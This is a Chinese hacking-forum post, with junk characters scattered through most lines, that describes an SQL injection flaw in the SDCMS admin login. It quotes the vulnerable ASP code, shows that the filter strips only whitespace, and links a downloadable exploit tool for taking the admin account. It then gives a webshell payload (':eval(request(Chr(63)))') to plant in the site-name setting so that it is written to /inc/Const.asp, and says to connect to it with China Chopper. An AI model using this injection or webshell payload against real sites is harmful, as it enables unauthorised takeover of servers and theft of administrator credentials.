作者:T00LS 鬼哥
8 Y9 H" Y+ Y# U* f1 r& P漏洞文件:后台目录/index.asp
- L6 A/ @0 q/ `+ ~
- X: L7 ?( n7 G0 M- @Sub Check
; f( s4 [ o( z6 K7 u Dim username,password,code,getcode,Rs
! Y3 F4 N; V% m. @) R IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
: b5 J. w& r% ^ z username=FilterText(Trim(Request.Form("username")),1)/ F r9 t/ D0 R% ~
password=FilterText(Trim(Request.Form("password")),1)
1 @! r. l: |+ x code=Trim(Request.Form("yzm")); J5 n2 W% ]+ U" ?% L) H, k7 m O
getcode=Session("SDCMSCode")- v' u# V& N0 Q- }6 f
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died; g# j0 K- J& p) z+ D3 N
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
% Z0 u, F6 C: f1 E& q# X S2 }. T IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)" ied
: [3 J' x/ J5 _. T# ]3 Z1 c4 V IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)" ied
; y/ Z$ ^; c: f, P IF username="" or password="" Then
% E' G* h' z4 }: y2 K0 L# N2 Z Echo "用户名或密码不能为空" ied+ G& H* Y \% b% @
Else
' p& H: |( I1 @/ Y Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")' \" K! O. T* P* Y8 c1 M) x
IF Rs.Eof Then& B( X8 G8 ]& R7 B3 Q& H5 E! k
AddLog username,GetIp,"登录失败",1: T0 R( @& m/ b1 v+ |
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
4 X2 ~/ o8 D# v( n Else
; T V( U9 U6 `( o! \2 i. H Add_Cookies "sdcms_id",Rs(0)
1 W. w; H9 S/ o v( Q% m2 _/ M+ E Add_Cookies "sdcms_name",username1 E. A L4 f0 m
Add_Cookies "sdcms_pwd",Rs(2)
. X3 {2 c; [5 S, X# _2 o Add_Cookies "sdcms_admin",Rs(3)
7 y2 a& H2 | ^ A% T6 ~3 A Add_Cookies "sdcms_alllever",Rs(4)
: f* X; Q+ o' H' q9 C Add_Cookies "sdcms_infolever",Rs(5)% q8 X% G2 `$ y9 _
Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")7 ^/ `+ h8 R7 W& W1 t" x \
AddLog username,GetIp,"登录成功",10 c' ]* i7 o% B0 V
'自动删除30天前的Log记录" G" A& t9 ^/ s6 O9 ~& J
IF Sdcms_DataType Then1 {( n6 f r: [* f! u* F5 u( J
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
. S! _# }( c* N: |( U9 @6 f Else, ?3 d" L- B! N! J: s4 X5 O6 ]
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
& u4 `( `8 j& E2 o2 D% B End IF# r$ o9 S6 U Z3 q3 X2 Q# L+ i
Go("sdcms_index.asp")
1 y3 |7 D! q; H6 l# U End IF
Z) f+ J! Z# `2 x3 u Rs.Close( {6 R; L$ r$ p. V; K9 w
Set Rs=Nothing0 \& h, g4 V) v" D9 T* Q% i& s! b
End IF: M! F% ]6 K) {: T; @0 @' S
End Sub
# f5 q. Y: L$ d' S4 o6 g- s: G
7 a" H# t1 U9 ^8 _# T0 o’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码2 {: M2 Y- X5 m) n( X% [
- s+ L8 A4 Q- v/ ^3 ]
Function FilterText(ByVal t0,ByVal t1)0 s, }# t e. Q4 t0 e0 O. {2 I
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function4 s/ _) V, h+ m' T7 ?1 ]. V
t0=Trim(t0)
/ Y4 h6 ~) U+ }% a. x Select Case t1
2 ~7 G. l- ^' z/ i+ @ Case "1"
- b. K& Q0 p& @9 H- ^& L4 h t0=Replace(t0,Chr(32),"")
! ?$ n) S+ x P1 i' Q: f; I t0=Replace(t0,Chr(13),"")
9 U2 K4 e5 i7 ~9 d% y" { t0=Replace(t0,Chr(10)&Chr(10),"")
# A4 v% y. G6 H1 K2 J6 a, A4 n& f, r t0=Replace(t0,Chr(10),"")) D& }3 ]! _" e. z
Case "2"
; s0 @# R3 T. y( D0 i t0=Replace(t0,Chr(8),"")'回格! z$ m3 v* T* G) n- i; b4 Z! C
t0=Replace(t0,Chr(9),"")'tab(水平制表符)4 D2 B! r, v6 W
t0=Replace(t0,Chr(10),"")'换行1 X9 H+ ]. j0 X6 C6 A7 g
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)9 D" p" s/ Y1 n0 r% B5 B3 e( W
t0=Replace(t0,Chr(12),"")'换页. q8 s9 C& S' n. a2 x
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
' d6 |( _0 l: n3 T: D. o t0=Replace(t0,Chr(22),"")2 I8 F$ `7 {9 y+ h0 E( I
t0=Replace(t0,Chr(32),"")'空格 SPACE- V# G: N, S" C7 E7 J( I/ \2 j$ F
t0=Replace(t0,Chr(33),"")'!* z+ b' F: c, X, g
t0=Replace(t0,Chr(34),"")'"4 A- ]: o+ e/ R8 R* w( g
t0=Replace(t0,Chr(35),"")'#$ t Y- Y! M9 ?" h1 P" I
t0=Replace(t0,Chr(36),"")'$: w- @2 q7 j: o2 J8 u
t0=Replace(t0,Chr(37),"")'%+ D! i1 X) I( z' h- z3 S
t0=Replace(t0,Chr(38),"")'&
, M* P/ D5 w* ]- C& y t0=Replace(t0,Chr(39),"")''
1 T8 k. u2 `' ~! ^4 K1 k t0=Replace(t0,Chr(40),"")'(
& A+ a& G* B, ^& g t0=Replace(t0,Chr(41),"")')3 M, M! F' N, x6 A
t0=Replace(t0,Chr(42),"")'*
! J' Q5 V+ a' k t0=Replace(t0,Chr(43),"")'+
" g) j$ X' l, X# A3 V2 E t0=Replace(t0,Chr(44),"")',
! p! P! b& ^$ t X s t0=Replace(t0,Chr(45),"")'-; N7 q) K7 r8 _+ K) l' z8 H
t0=Replace(t0,Chr(46),"")'.
2 ~; I- Q j! k* o. {/ L" d t0=Replace(t0,Chr(47),"")'/* V! v9 x+ A" u2 m9 C @
t0=Replace(t0,Chr(58),"")':
# }# m$ p% O" E+ e1 M t0=Replace(t0,Chr(59),"")';
4 r; z4 r/ T `7 }7 a( j t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
/ {9 \% Z9 U) H; {. J6 R$ e t0=Replace(t0,Chr(63),"")'?2 Z1 v" K# Y6 K1 Q3 }1 `# Z) u$ Z+ B
t0=Replace(t0,Chr(64),"")'@
$ u+ ~) X* G3 |! J) J3 O! { t0=Replace(t0,Chr(91),"")'\+ O# b6 p( D- z6 O) u8 j: ~6 d
t0=Replace(t0,Chr(92),"")'\
2 i( o; s% m, r$ Y. d; X6 f1 z t0=Replace(t0,Chr(93),"")']
; Q$ P/ g2 H; i- i t0=Replace(t0,Chr(94),"")'^
: E2 Z7 a/ [6 R t0=Replace(t0,Chr(95),"")'_2 J) V1 `. P% [) A' Y
t0=Replace(t0,Chr(96),"")'`0 }" i: _ r# k2 b- m# I; F, o
t0=Replace(t0,Chr(123),"")'{! }) f# B' x2 w6 T5 H
t0=Replace(t0,Chr(124),"")'|
4 w# h( o+ R) `& I3 E1 O t0=Replace(t0,Chr(125),"")'}! m9 ?( d) n" W9 [: X
t0=Replace(t0,Chr(126),"")'~
f3 @ N" E/ c2 M" g: B) _0 `5 D Case Else
+ r) _# t# q; a) V# w t0=Replace(t0, "&", "&")
+ \( h) K4 [% M7 O t0=Replace(t0, "'", "'")
5 U7 L, U# Z: t- e1 `, W0 r t0=Replace(t0, """", """)/ B8 b0 l& r+ |) o
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")3 _7 U6 R- @! N# t* T- i
End Select
- e" l' v" O$ h) g2 { IF Instr(Lcase(t0),"expression")>0 Then* H3 k7 F2 ?* I# @# E9 G
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)' J6 Y0 x) ~2 Z" Q2 p5 Q1 ?
End If
: z2 \+ [. C+ G: W, k4 _ FilterText=t03 C! c7 `5 _! G0 @8 L- m
End Function
6 k2 u' Z" u3 q5 D2 P0 r
$ f* K8 c1 A6 }* Y看到没。直接参数是1 只过滤3 x4 h* F# x3 d
t0=Replace(t0,Chr(32)," ")" p0 ~4 F' f9 |# S
t0=Replace(t0,Chr(13),"")3 d _8 G) D/ U- F- w$ R3 F+ d1 ^
t0=Replace(t0,Chr(10)&Chr(10),"6 S# P. | T8 j8 h
")
- \4 q! N& n5 \( H t0=Replace(t0,Chr(10),": H- r5 P0 Q# |6 ]% l2 p
")) K1 B1 m% y0 T: ^5 v1 a# e
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!9 X% E5 H" H0 o' E# k+ M- `
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP$ [% k, h- h+ Q* \
. q Y& Z0 h/ p' j" U测试:8 T4 w' L0 V& Q! M, l" U2 Z# u8 i: u
% X$ \! M$ \/ Y, G
& q. `/ y+ F$ R$ v: m
现在输入工具上验证码,然后点OK
. h4 q; ]" [; k" I' J
0 t5 y( S! ^4 w' d5 W( M4 q# _0 M4 X* M# e
看到我们直接进入后台管理界面了,呵呵!, k$ J$ X# A) L8 _- N
6 c$ p" H! k! ?7 F# [, _
! ]! T1 S h1 k2 R4 K) k
' @6 K: z; E# i: F; U2 K这样直接进入后台了。。。。
5 q6 C0 T) h4 O& v8 R3 j" h! q, i z- T# J' e/ `
2 m/ ^. Q9 u0 g2 }
, U; M+ g" W+ r4 r8 A8 R
SDCMS提权:
8 I/ N/ }4 T+ i# _8 Z6 c% h, j3 k/ X R$ t- B2 C
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?2 _. a0 x' M2 \; V3 @" j& i
, |! S9 P* z+ G" \
( P# ?, f4 q4 _$ R# ]+ G [
( z P4 g; q6 Y c/ @2 ^OK,现在用菜刀连接下!; t7 @( J& h( v, {9 p% M
& J2 `9 y+ p% Q9 V
L& u& {4 `& Y% z
0 n0 L& a* D% }! V3 B
- E$ X+ B- T0 ?0 c: o5 A! Y
% u3 Y3 D' f% S# y |